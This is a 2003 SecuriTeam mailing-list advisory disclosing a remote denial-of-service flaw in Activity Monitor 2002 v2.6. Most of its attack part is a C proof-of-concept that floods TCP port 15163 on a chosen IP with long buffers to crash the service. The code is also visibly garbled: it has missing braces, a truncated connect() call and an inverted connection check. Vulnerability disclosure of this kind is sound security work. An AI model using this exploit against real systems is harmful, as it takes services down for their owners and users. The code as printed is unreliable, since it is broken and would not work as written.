[NT] Activity Monitor Remote Denial of Service (TCP 15163)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/30/03

    To: list@securiteam.com
    Date: 30 May 2003 17:16:51 +0200

    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Activity Monitor Remote Denial of Service (TCP 15163)

     <http://www.softactivity.com/> Activity Monitor 2002 is "a monitoring
    software system for real time employee monitoring and continuous tracking
    of users activities on networked computers". A vulnerability in the
    product allows remote attackers to cause the product to crash by sending
    it an arbitrary long buffer.

    Vulnerable systems:
     * Activity Monitor 2002 version 2.6

    By connecting TCP port 15163 and sending a long string, a remote attacker
    could cause the application to crash and exhaust CPU resources.

    #include <stdio.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <string.h>

    int main(int argc, char **argv)

      int i,ck,port,sd;
      char dos[10000];

      struct sockaddr_in act_mon_server;

      if(argc < 2)
        printf("\nUsage: %s <ip>\n", argv[0]);
      port = 15163;
      for(i = 0; i < 10000; i++) dos[i] = 'x';
      act_mon_server.sin_family = AF_INET;
      act_mon_server.sin_port = htons((u_short)port);
      act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);
      sd = socket(AF_INET, SOCK_STREAM, 0);
      ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
      if(ck != 0) {
      printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
      printf("\t\tby Luca Ercoli luca.ercoli@inwind.it\n\n");

      write(sd, dos, sizeof(dos));
      write(sd, dos, sizeof(dos));
      write(sd, dos, sizeof(dos));
      printf("\nDoS sent!\n");

    The information has been provided by <mailto:luca.ercoli@inwind.it> Luca

    This bulletin is sent to members of the SecuriTeam mailing list.

    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.